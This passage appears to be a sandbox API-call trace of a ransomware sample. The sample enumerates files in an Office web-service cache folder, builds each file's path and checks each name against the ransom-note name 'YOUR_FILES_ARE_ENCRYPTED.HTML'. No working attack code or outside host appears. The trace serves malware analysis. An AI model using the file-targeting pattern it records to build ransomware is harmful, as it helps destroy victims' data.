returned="" [0111.366] lstrlenW (lpString="") returned 0 [0111.366] PathFindExtensionW (pszPath="511B4AE9-CD73-4ED0-A899-602921314CEC") returned="" [0111.366] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb498698b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb498698b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4987c9e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x447b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="51EEACD8-6D0A-427B-9F9A-2364D7526946", cAlternateFileName="51EEAC~1")) returned 1 [0111.366] StrStrIW (lpFirst="51EEACD8-6D0A-427B-9F9A-2364D7526946", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.366] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\51EEACD8-6D0A-427B-9F9A-2364D7526946") returned 157 [0111.366] PathFindExtensionW (pszPath="51EEACD8-6D0A-427B-9F9A-2364D7526946") returned="" [0111.366] lstrlenW (lpString="") returned 0 [0111.366] PathFindExtensionW (pszPath="51EEACD8-6D0A-427B-9F9A-2364D7526946") returned="" [0111.366] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9a9f9a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9a9f9a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9ab2ec, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x135f, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="527E72B9-408B-4184-BDFE-B1A13583E883", cAlternateFileName="527E72~1")) returned 1 [0111.366] StrStrIW (lpFirst="527E72B9-408B-4184-BDFE-B1A13583E883", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.366] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\527E72B9-408B-4184-BDFE-B1A13583E883") returned 157 [0111.366] PathFindExtensionW (pszPath="527E72B9-408B-4184-BDFE-B1A13583E883") returned="" [0111.366] lstrlenW (lpString="") returned 0 [0111.366] PathFindExtensionW (pszPath="527E72B9-408B-4184-BDFE-B1A13583E883") returned="" [0111.366] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82431f7d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82431f7d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82431f7d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2c34, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="54F1F5D9-45D4-4B27-9109-44EC293794DD", cAlternateFileName="54F1F5~1")) returned 1 [0111.366] StrStrIW (lpFirst="54F1F5D9-45D4-4B27-9109-44EC293794DD", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.366] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\54F1F5D9-45D4-4B27-9109-44EC293794DD") returned 157 [0111.366] PathFindExtensionW (pszPath="54F1F5D9-45D4-4B27-9109-44EC293794DD") returned="" [0111.366] lstrlenW (lpString="") returned 0 [0111.366] PathFindExtensionW (pszPath="54F1F5D9-45D4-4B27-9109-44EC293794DD") returned="" [0111.366] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabaab9cf, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabaab9cf, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabaacd7e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1cab, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="580DF0A8-7B09-4BAC-BD6B-1096E9BDA073", cAlternateFileName="580DF0~1")) returned 1 [0111.368] StrStrIW (lpFirst="580DF0A8-7B09-4BAC-BD6B-1096E9BDA073", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.369] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\580DF0A8-7B09-4BAC-BD6B-1096E9BDA073") returned 157 [0111.369] PathFindExtensionW (pszPath="580DF0A8-7B09-4BAC-BD6B-1096E9BDA073") returned="" [0111.369] lstrlenW (lpString="") returned 0 [0111.369] PathFindExtensionW (pszPath="580DF0A8-7B09-4BAC-BD6B-1096E9BDA073") returned="" [0111.369] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b14252, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82b14252, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82b14252, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x23c3, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="5B268694-C256-497F-B57F-0B2D793CBA10", cAlternateFileName="5B2686~1")) returned 1 [0111.369] StrStrIW (lpFirst="5B268694-C256-497F-B57F-0B2D793CBA10", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.369] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\5B268694-C256-497F-B57F-0B2D793CBA10") returned 157 [0111.369] PathFindExtensionW (pszPath="5B268694-C256-497F-B57F-0B2D793CBA10") returned="" [0111.369] lstrlenW (lpString="") returned 0 [0111.369] PathFindExtensionW (pszPath="5B268694-C256-497F-B57F-0B2D793CBA10") returned="" [0111.369] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4cefda3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4cefda3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4cefda3, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x5128, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="5B7E87C2-FC64-4F92-8D24-251DE6AF63C0", cAlternateFileName="5B7E87~1")) returned 1 [0111.369] StrStrIW (lpFirst="5B7E87C2-FC64-4F92-8D24-251DE6AF63C0", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.369] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\5B7E87C2-FC64-4F92-8D24-251DE6AF63C0") returned 157 [0111.369] PathFindExtensionW (pszPath="5B7E87C2-FC64-4F92-8D24-251DE6AF63C0") returned="" [0111.369] lstrlenW (lpString="") returned 0 [0111.369] PathFindExtensionW (pszPath="5B7E87C2-FC64-4F92-8D24-251DE6AF63C0") returned="" [0111.369] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb47c8fe9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb47c8fe9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb47c8fe9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2bd8, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="5C0BDE60-5E07-41A7-9B09-743D207B4153", cAlternateFileName="5C0BDE~1")) returned 1 [0111.369] StrStrIW (lpFirst="5C0BDE60-5E07-41A7-9B09-743D207B4153", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.369] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\5C0BDE60-5E07-41A7-9B09-743D207B4153") returned 157 [0111.369] PathFindExtensionW (pszPath="5C0BDE60-5E07-41A7-9B09-743D207B4153") returned="" [0111.369] lstrlenW (lpString="") returned 0 [0111.369] PathFindExtensionW (pszPath="5C0BDE60-5E07-41A7-9B09-743D207B4153") returned="" [0111.369] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9fe464, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9fe464, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9fe464, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x487e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="5F3382B8-AFBF-4FEA-8B79-20898FE63A3D", cAlternateFileName="5F3382~1")) returned 1 [0111.369] StrStrIW (lpFirst="5F3382B8-AFBF-4FEA-8B79-20898FE63A3D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.369] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\5F3382B8-AFBF-4FEA-8B79-20898FE63A3D") returned 157 [0111.369] PathFindExtensionW (pszPath="5F3382B8-AFBF-4FEA-8B79-20898FE63A3D") returned="" [0111.369] lstrlenW (lpString="") returned 0 [0111.369] PathFindExtensionW (pszPath="5F3382B8-AFBF-4FEA-8B79-20898FE63A3D") returned="" [0111.369] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab8dcfea, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab8dcfea, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab8de19e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1bc0, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="63F61FAB-F252-401D-AB61-279343905D14", cAlternateFileName="63F61F~1")) returned 1 [0111.369] StrStrIW (lpFirst="63F61FAB-F252-401D-AB61-279343905D14", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.369] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\63F61FAB-F252-401D-AB61-279343905D14") returned 157 [0111.369] PathFindExtensionW (pszPath="63F61FAB-F252-401D-AB61-279343905D14") returned="" [0111.369] lstrlenW (lpString="") returned 0 [0111.369] PathFindExtensionW (pszPath="63F61FAB-F252-401D-AB61-279343905D14") returned="" [0111.369] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabbd098a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabbd098a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabbd1d40, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x242b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="6B8DE11F-3D5A-48C6-81AA-977DA661E2C5", cAlternateFileName="6B8DE1~1")) returned 1 [0111.370] StrStrIW (lpFirst="6B8DE11F-3D5A-48C6-81AA-977DA661E2C5", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.370] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\6B8DE11F-3D5A-48C6-81AA-977DA661E2C5") returned 157 [0111.370] PathFindExtensionW (pszPath="6B8DE11F-3D5A-48C6-81AA-977DA661E2C5") returned="" [0111.370] lstrlenW (lpString="") returned 0 [0111.370] PathFindExtensionW (pszPath="6B8DE11F-3D5A-48C6-81AA-977DA661E2C5") returned="" [0111.370] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cfd55e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82cfd55e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82d37ecc, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x7b5, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="6E234531-C2BA-4F08-BC11-2ECA97A03E84", cAlternateFileName="6E2345~1")) returned 1 [0111.370] StrStrIW (lpFirst="6E234531-C2BA-4F08-BC11-2ECA97A03E84", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.370] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\6E234531-C2BA-4F08-BC11-2ECA97A03E84") returned 157 [0111.370] PathFindExtensionW (pszPath="6E234531-C2BA-4F08-BC11-2ECA97A03E84") returned="" [0111.370] lstrlenW (lpString="") returned 0 [0111.370] PathFindExtensionW (pszPath="6E234531-C2BA-4F08-BC11-2ECA97A03E84") returned="" [0111.370] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc853d4e0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc853d4e0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc85646d8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xbec, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="6E4EC81F-6A7B-442E-91B3-150ED476524B", cAlternateFileName="6E4EC8~1")) returned 1 [0111.370] StrStrIW (lpFirst="6E4EC81F-6A7B-442E-91B3-150ED476524B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.370] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\6E4EC81F-6A7B-442E-91B3-150ED476524B") returned 157 [0111.370] PathFindExtensionW (pszPath="6E4EC81F-6A7B-442E-91B3-150ED476524B") returned="" [0111.370] lstrlenW (lpString="") returned 0 [0111.370] PathFindExtensionW (pszPath="6E4EC81F-6A7B-442E-91B3-150ED476524B") returned="" [0111.370] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b980a1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82b980a1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82b99326, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x401d, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="6E87FFA6-570D-4F3C-832C-0F0ED39D0DE2", cAlternateFileName="6E87FF~1")) returned 1 [0111.370] StrStrIW (lpFirst="6E87FFA6-570D-4F3C-832C-0F0ED39D0DE2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.370] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\6E87FFA6-570D-4F3C-832C-0F0ED39D0DE2") returned 157 [0111.370] PathFindExtensionW (pszPath="6E87FFA6-570D-4F3C-832C-0F0ED39D0DE2") returned="" [0111.370] lstrlenW (lpString="") returned 0 [0111.370] PathFindExtensionW (pszPath="6E87FFA6-570D-4F3C-832C-0F0ED39D0DE2") returned="" [0111.370] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e1fcfd, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4e1fcfd, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4e1fcfd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x6b94, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="6FAC1ABE-E66B-4F61-9B4F-953EFAF7BBF5", cAlternateFileName="6FAC1A~1")) returned 1 [0111.370] StrStrIW (lpFirst="6FAC1ABE-E66B-4F61-9B4F-953EFAF7BBF5", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.370] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\6FAC1ABE-E66B-4F61-9B4F-953EFAF7BBF5") returned 157 [0111.370] PathFindExtensionW (pszPath="6FAC1ABE-E66B-4F61-9B4F-953EFAF7BBF5") returned="" [0111.370] lstrlenW (lpString="") returned 0 [0111.370] PathFindExtensionW (pszPath="6FAC1ABE-E66B-4F61-9B4F-953EFAF7BBF5") returned="" [0111.370] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4cf260c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4cf260c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4cf260c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xb156, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="719CA5E5-2264-4D2B-B1BC-1979AE2F8481", cAlternateFileName="719CA5~1")) returned 1 [0111.370] StrStrIW (lpFirst="719CA5E5-2264-4D2B-B1BC-1979AE2F8481", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.370] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\719CA5E5-2264-4D2B-B1BC-1979AE2F8481") returned 157 [0111.370] PathFindExtensionW (pszPath="719CA5E5-2264-4D2B-B1BC-1979AE2F8481") returned="" [0111.370] lstrlenW (lpString="") returned 0 [0111.370] PathFindExtensionW (pszPath="719CA5E5-2264-4D2B-B1BC-1979AE2F8481") returned="" [0111.370] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b05ffa, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8b05ffa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8b07378, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x60e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="73949334-7885-4202-9F99-AD59E8565AB6", cAlternateFileName="739493~1")) returned 1 [0111.371] StrStrIW (lpFirst="73949334-7885-4202-9F99-AD59E8565AB6", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.371] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\73949334-7885-4202-9F99-AD59E8565AB6") returned 157 [0111.371] PathFindExtensionW (pszPath="73949334-7885-4202-9F99-AD59E8565AB6") returned="" [0111.371] lstrlenW (lpString="") returned 0 [0111.371] PathFindExtensionW (pszPath="73949334-7885-4202-9F99-AD59E8565AB6") returned="" [0111.371] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82347855, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82347855, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82347855, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x7b5, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="7556BF3B-E5BE-4025-8D5A-49FA9D433775", cAlternateFileName="7556BF~1")) returned 1 [0111.371] StrStrIW (lpFirst="7556BF3B-E5BE-4025-8D5A-49FA9D433775", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.371] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\7556BF3B-E5BE-4025-8D5A-49FA9D433775") returned 157 [0111.371] PathFindExtensionW (pszPath="7556BF3B-E5BE-4025-8D5A-49FA9D433775") returned="" [0111.371] lstrlenW (lpString="") returned 0 [0111.371] PathFindExtensionW (pszPath="7556BF3B-E5BE-4025-8D5A-49FA9D433775") returned="" [0111.371] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc882d53e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc882d53e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc882e8bd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x722, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="7600EED5-3234-4650-8D9A-67C39E956D87", cAlternateFileName="7600EE~1")) returned 1 [0111.371] StrStrIW (lpFirst="7600EED5-3234-4650-8D9A-67C39E956D87", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.371] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\7600EED5-3234-4650-8D9A-67C39E956D87") returned 157 [0111.371] PathFindExtensionW (pszPath="7600EED5-3234-4650-8D9A-67C39E956D87") returned="" [0111.371] lstrlenW (lpString="") returned 0 [0111.371] PathFindExtensionW (pszPath="7600EED5-3234-4650-8D9A-67C39E956D87") returned="" [0111.371] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab8eb87c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab8eb87c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab8eb87c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2b3a, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="7721B2AE-B090-4504-BDD6-67E4CA8932FF", cAlternateFileName="7721B2~1")) returned 1 [0111.371] StrStrIW (lpFirst="7721B2AE-B090-4504-BDD6-67E4CA8932FF", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.371] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\7721B2AE-B090-4504-BDD6-67E4CA8932FF") returned 157 [0111.371] PathFindExtensionW (pszPath="7721B2AE-B090-4504-BDD6-67E4CA8932FF") returned="" [0111.371] lstrlenW (lpString="") returned 0 [0111.371] PathFindExtensionW (pszPath="7721B2AE-B090-4504-BDD6-67E4CA8932FF") returned="" [0111.371] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabae28fb, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabae28fb, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabae3bb5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1f8f, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="7C92FCEB-66EB-471D-9BA1-BDEE0E12FD94", cAlternateFileName="7C92FC~1")) returned 1 [0111.371] StrStrIW (lpFirst="7C92FCEB-66EB-471D-9BA1-BDEE0E12FD94", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.371] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\7C92FCEB-66EB-471D-9BA1-BDEE0E12FD94") returned 157 [0111.371] PathFindExtensionW (pszPath="7C92FCEB-66EB-471D-9BA1-BDEE0E12FD94") returned="" [0111.371] lstrlenW (lpString="") returned 0 [0111.371] PathFindExtensionW (pszPath="7C92FCEB-66EB-471D-9BA1-BDEE0E12FD94") returned="" [0111.371] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824b5bdf, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x824b5bdf, 